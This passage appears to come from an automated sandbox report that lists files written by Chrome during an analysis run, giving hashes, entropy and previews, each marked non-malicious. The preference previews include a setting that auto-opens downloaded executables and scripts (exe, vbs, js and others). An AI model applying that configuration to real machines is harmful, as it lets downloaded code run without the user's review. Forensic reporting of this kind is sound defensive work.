                                                                                                                                                                      SSDEEP:384:sSGLl2Xq1kXqKf/pUZNCgVLH2HftmrUMqiFM42:iLlcq1kXqKf/pUZNCgVLH2HforUwat
                                                                                                                                                                      MD5:D6D0A7FCA30A676431BF6902ED5E35C2
                                                                                                                                                                      SHA1:458BB971CF3B0E3F94F71EA1FED70F78256FB2BB
                                                                                                                                                                      SHA-256:58CBC14A053C78B9300756209F32B81476BCE53BEA62611FD98612F80075D604
                                                                                                                                                                      SHA-512:EBD1BD09F21363159D3839A859C29ADA14BE09ACAB21ACCE189B39112A2213C5280FD9A2292B0EA6812AA14A85370CFD6F0FB7B8263211C85C38289A0B6C67C7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777956651605","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8515
                                                                                                                                                                      Entropy (8bit):5.117689010228945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9q88yy+FqTkqrSb+klmFHlphbjAQqtjEsXtSct:MX3iyxqtrSb2YtIsXtSct
                                                                                                                                                                      MD5:B00545064D757B5D341DC1E8B7933AFA
                                                                                                                                                                      SHA1:EDB4C77B9873F7C6C562243143C54058040666A7
                                                                                                                                                                      SHA-256:DCEC3A3C0EB5A47A04AFCD130C3ABCE815385492C70A9D96DEC92FE3184CA143
                                                                                                                                                                      SHA-512:45DBFAC590DA266AFAD40572B3070AE2E9C8D6175E3FBE05ABDC37D87067D3BF09476B01A312B546AE2320C476C4A9F26852C4437C0B9541F4D027F2DB69A36B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8192
                                                                                                                                                                      Entropy (8bit):5.104555075948432
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9q88yy+FqGxb+klmFHlphbjAQqtjEsXtSc+:MX3iyxqGxb2YtIsXtSc+
                                                                                                                                                                      MD5:CD095C289511398EB3291F2E1D1B1241
                                                                                                                                                                      SHA1:C654334A1B0CA153F1193E042510747457A2AFBC
                                                                                                                                                                      SHA-256:EA7B3CF55887FC38295E990949137CC81A4A487A8000ED4BCE45F83D0B05F1FC
                                                                                                                                                                      SHA-512:028FAF5C67537C87B0A7846906567396141F7C1434E8FFAE9D8BF4CEB0743CED161AF71295317786722F4F459BE4A5FCFD0EAC13A66265ECAD02E9D313B6C9E7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8453
                                                                                                                                                                      Entropy (8bit):5.116700287137193
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9q88yy+FqTkqrMb+klmFHlphbjAQqtjEsXtSct:MX3iyxqtrMb2YtIsXtSct
                                                                                                                                                                      MD5:706CCE7039D09220811648ACF6C7B327
                                                                                                                                                                      SHA1:C512BE311D2D96F06BDFA8B1950B206E06665713
                                                                                                                                                                      SHA-256:45CED4E266DFA70E6B765DE0CA5BE797496290E13A5ECBC894B03D6965F195EA
                                                                                                                                                                      SHA-512:E1517B2A0D91EE2AD980F996DFB3639F74354A5DEDE9614A124DC7655181724A2F131277D85C52712B30BA0CBD142A7C0FFBC54FF1AD00911812F418AA895588
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):14764
                                                                                                                                                                      Entropy (8bit):5.567950834758074
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:sZMLl2Xt1kXqKf/pUZNCgVLH2HftWrUxafFM4J:nLlct1kXqKf/pUZNCgVLH2HfkrUgfa2
                                                                                                                                                                      MD5:FD9F0D34D1FBA5549859C8254AA91098
                                                                                                                                                                      SHA1:2C766EC3488842659E51201BA47A35D71179C6C4
                                                                                                                                                                      SHA-256:3DEBA4EEB3BEBA931313F331E9F94AADCDBD6E61ED9AD97920A49D86D540B357
                                                                                                                                                                      SHA-512:84D10A89D9DF91881D983C9632288F6F3D2A5AE29A1C93301E7A671017EF61EE7303D722D25FA84462B411F1B7B2BA71B8F1EF4C06234E8BCB76CF472230496D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777956651605","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):48399548
                                                                                                                                                                      Entropy (8bit):7.998960997202003
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:786432:jVcuCYHEFjscSVbUhsfy/IbdHUudj5wy4EjUuJ9DFn80Yu+HATEDvBgxBVHw1Jdh:ZcuCkTVohgyQ59wy4EzNWggDv2xjUJUe
                                                                                                                                                                      MD5:F8432B18E3E4BF76AE683D4FB831873E
                                                                                                                                                                      SHA1:ADBBEF7F7E47CB9CD0FA4508F5D49AB3994BC88A
                                                                                                                                                                      SHA-256:2FB76AAAE2AFD77E633C301DC363AB476FCA4C945EC70BEB6F7CEE2EF7FF6041
                                                                                                                                                                      SHA-512:2F17D05BA9463CF5D50DD8CF315FA872C534F50682697770C66A3BDCA59805A488CE19411FD54953D86F2A90B7C7AB6854E8249BBD8179A4B617DCE1C7B77D6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............w.H..z.fl.#as.7.d....J[SpF.4.[..JuW@...*.E..)T....OzW..C..N.-.U...1..F..Y(.....E.F..M... ..X.*.1.D."y..{..)......!.@+..jC.;.u.=..+...W<e.......T...S0|.5k.9A..B....;....jB.N.2u...S.Pv......Y>..F..h..Y0..s....x....tm.#.Z..I....n.8"....].4/....z...'cBp.H.....p..0..[l..?....\M..6....mQ...P...3Ru$...u.I.<.Nn.;Wvm....dd.I.m..>l....8./.....\..<..z...s..Y..vx]..>..@V_ &.'S.....D^h.[ng..G..e....>9...zl..1...8
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):149
                                                                                                                                                                      Entropy (8bit):5.329148891296734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:gAWY3tNQWHY0zMwqELrrmHWKXaGfQDSA+F/8b3iDtWsL:qY3tNp40zMw/yHNKGf8z+FWiDhL
                                                                                                                                                                      MD5:42DAB3BE716D32C017C35C5CD76CF126
                                                                                                                                                                      SHA1:9FEB29E753A549FB3C406B0D15954ACD21A5E1DE
                                                                                                                                                                      SHA-256:69784623F345AA24D7C675D8C0A026EB9A167DBD01DFF25C1EC524E7ADC62E82
                                                                                                                                                                      SHA-512:B58D5C829FE16C33EE804BAEF709BAAECCC8EBE67A99DCD0FA33AB75AB320B4AEC6F7D8E6910EA152C74CBE73A8836D4195CF94B22620C56CAFF73323F174DE6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1659361537155&target=OPTIMIZATION_TARGET_PAGE_ENTITIES..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4955
                                                                                                                                                                      Entropy (8bit):7.9048440594438185
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:m3Rjis6KpU2mQIuizB0QknoAGKQ6pL65a9gNWADJz8I13EdAhTtQ2LwI61abHwdz:cus6KatWifkoAGN6s5a9mFU+TRbQh3X
                                                                                                                                                                      MD5:766A3E17C6325AACDB116643EBE05F7D
                                                                                                                                                                      SHA1:E9709278668DC4C2930A956AFABA2A2E64029CF8
                                                                                                                                                                      SHA-256:1C6EE9F6267A7C38C8EC1CD015495A5C80324DC417A35672C9CC90931F89F1F4
                                                                                                                                                                      SHA-512:686CD14585D7AE04FAF2ADFF6B5F1DB575DB9B106BD5C97957DA2452FE6BBD617CFD01841976A5FFD248EFBC62D502AF0CC0B7989A3BB3C2A960EB29EE273F27
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<...............@....A..h=....g..C..b.H.....nj.6.6...noT>..+3..;.0.(.ys.....{.*..x...,P.3+.|...7j..z..@.:.[...).7.n.*.Y-..R3...j.\......y.....".......c......y...0s.E......g0.fC....F...l.......).....B.b$.$...U..'.1.[.:.L.b`..s1i...J.........$..#...".7.......K.b.).h.J.......#.2.a.p.B......s..'..s..'.Z.uS..de..B........3..2.,.A..ZT.~>..Y~sq!.,....).C0.c..1?B....1.@..Y.....w..I..f.y.S..H..X.6o.8(.... 1j....+I?....Bvs.h.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):171
                                                                                                                                                                      Entropy (8bit):5.422913312692801
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:gAWY3tNQWHY0zMwqELrrmHWKXaGXUUeQCA+F/8b3iDDz8LYXLFgjsjy:qY3tNp40zMw/yHNKGXNeQD+FWiDDbbFM
                                                                                                                                                                      MD5:552717125583DD0F982A19DC01C362FD
                                                                                                                                                                      SHA1:FF025F074C9A2038666E9653794A332BED7A855D
                                                                                                                                                                      SHA-256:95E0F4E79E26ABEDBD05456066F1733594CFCE1DE0773FFC91CDE8D04C591E16
                                                                                                                                                                      SHA-512:1E9092F725C3E3B238679CD6CC657FC0C50A22E276D79D37884CAC4B4E57A0BB4E005B875BDC3A16A4244B892243DF9C24043923E59E3CC92C5BEF99E13597A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568541167&target=OPTIMIZATION_TARGET_NOTIFICATION_PERMISSION_PREDICTIONS..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9419
                                                                                                                                                                      Entropy (8bit):7.925159491819897
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:cUyvLGbeIU8i4Vua0ILg6tuyqlCUtd8n9p4aimegsai+rt:PyjU0a0ILgOZ26zjt
                                                                                                                                                                      MD5:AC1A5B29CB8C1984BF9D47EBC28C6C0B
                                                                                                                                                                      SHA1:41D27BB0BCC44BAACF6260B15C233D92652201B3
                                                                                                                                                                      SHA-256:E9F5E92EC8F10E9A09F8F50692AC37119E843F3E6938E602B7C5DD248AD8F593
                                                                                                                                                                      SHA-512:582D18621DBD0B8DFC03FEFF01EE8E28F7BB58B8F0BB991CD1238D4116E35DA59075E9CCE08CB2BDD1C1BA1664CBC4B51615BDFAAC13118CBBFA80EE8E12D17D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<..............y...f.A......V....X...4..1..Jg..:...I......#.f..P...N..P..~O..9LP..k{NP..R.....wP.yw......D.....].yc.eT.*.../.VC%D.......j.JgP...2..3..a.*..c...q.t...4_.o.WpUAZ.$.%kB.~.... ....Ir.HM.'...A.."W.....L3.a.|...b..%.5d...qy..s.......'.VT}@..^...<.......(..w...K..)&..3RR6.<.g`.e.b..P.+.E$...:....../E..`Y...r.....vT.i...V.).N,..F.Z....~XQ.u...Ev...=......u~<.z...8.}rE.,tQhX.rFz.^1.|@.....<I...x7.s...i...@.8.k.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):172
                                                                                                                                                                      Entropy (8bit):5.386205294326134
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:gAWY3tNQWHY0zMwqELrrmHWKXaR8dDR9A+F/8b3iDrVXqogppEi0o/:qY3tNp40zMw/yHNKREXA+FWiDrlgppLd
                                                                                                                                                                      MD5:D5C72B00E89E9C7BF530B44D6378A05C
                                                                                                                                                                      SHA1:7CC976EBD4240CD4F2F72021241D6D47D9BE13B6
                                                                                                                                                                      SHA-256:5FCB0BCCAFD16D8E5BBF3043BBF01E7CAE2755999DE985517FBB2C95C1F7D5BD
                                                                                                                                                                      SHA-512:7BD7B127CE1D68ACA0C546DCF3ECC03DE8EE6BC331954FC71E035ACEC397C6E65443EFE3CF1C95DFD6C636DAC0ACEA6944734231E5A7553F6643FBAAB42C1008
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=2202180000&target=OPTIMIZATION_TARGET_SEGMENTATION_CHROME_LOW_USER_ENGAGEMENT..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):265060
                                                                                                                                                                      Entropy (8bit):7.995649560918691
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:6144:j71bE8xvMX08XghZNhvfhua/I4dMdYuw4/xCRxQkdE6oa:jp1xE3g3Nhvf39dMNxxyxGLa
                                                                                                                                                                      MD5:46D927BF3AE7285ECF3E1BEB08A6AD03
                                                                                                                                                                      SHA1:5B94DF9B032536DCA3C493B0A11341EFA7898477
                                                                                                                                                                      SHA-256:636EB2212BD1C34A6D9745F271AC0ED9695B727D2EF41747DD7E387C98F33EA5
                                                                                                                                                                      SHA-512:1DDAFD04C3F9B49D8E86F0E0B2CA438D851A3B7C4DDFF8BB982512F28A340DAC7D490EDBD5D3CF59C41B3E2F2F320B767557B8DD0E715366DFE0527F0E0003BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............|...d...0j.Ta..68Q..B..3..Iq..._a......V...wa.'D.t.d.c2c/u..-..<......k.W.[..9`.....N.........[.l..B.y...4MQ........T..(....p..)1^....?..^.[.09A....d-.....r....9.......\.%a..-M..=.F#\.}.f.K.\:.....h.R.}b.......?n.?H!7......e.<.*f. !5q.8..i.,a.R:..@X3..=4....H.bD?....d^`\.=i....NO.I..J.6...y...o..O...w.c.....Z...Wu.n..8.0@.M.'.H6>F=.lm~^Km.....S.:..@r..U..........T..k.x.q...~m...J...)..#...F\..Wq.2..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):154
                                                                                                                                                                      Entropy (8bit):5.427678974330711
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:gAWY3tNQWHY0zMwqELrrmHWKXaGzIJShF/8b3iDXRm2mGAvn:qY3tNp40zMw/yHNKGG6FWiDXNXAv
                                                                                                                                                                      MD5:BBB6B216D77E537215AF590F04EE20A6
                                                                                                                                                                      SHA1:C8282C5F823F1561366656BAEB683E628BD7D1A2
                                                                                                                                                                      SHA-256:C1917E2FCC784CFD27ADE41207E6E4C1E13403E68F5397714E685D52B33CC6C8
                                                                                                                                                                      SHA-512:15ADEEC8FB13006C216F92807835DB5EEFB9349076D37B6FB7E7A16C77F54DE5E6D6BCD4B1AC14BB78F58E75217671216EFFB858478F4DA72104E4C70DF78D8F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[ZoneTransfer]..ZoneId=3..HostUrl=https://optimizationguide-pa.googleapis.com/downloads?name=1660568498583&target=OPTIMIZATION_TARGET_LANGUAGE_DETECTION..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):11217
                                                                                                                                                                      Entropy (8bit):6.069602775336632
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                                                                                                                                      MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                                                                                                                                      SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                                                                                                                                      SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                                                                                                                                      SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                      Entropy (8bit):5.543392081061321
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YYi9RAeU/f76H0UQ0UrfwU5LG1KUSUaRU7Q:YhieUn76UUHvUIKUSUaU0
                                                                                                                                                                      MD5:7D564E363529A5A34E9ECC28E114B182
                                                                                                                                                                      SHA1:A72D592A6AAB0CE8543CF5389FECF3D2DF194E54
                                                                                                                                                                      SHA-256:3B8511CFD27BD0F4B44FCCF2A23491B52528C265907B1C750DD1E8DB058AE9A0
                                                                                                                                                                      SHA-512:AEA2B43F40CFC11DB968A7D6EAB26F71F63482086195C7668EEA7586F5CDE1FD7B77FE92AB2EB0B8F4B1B1679EF8E22127A31B48CDFAEC1F0859001E8BCACAA7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
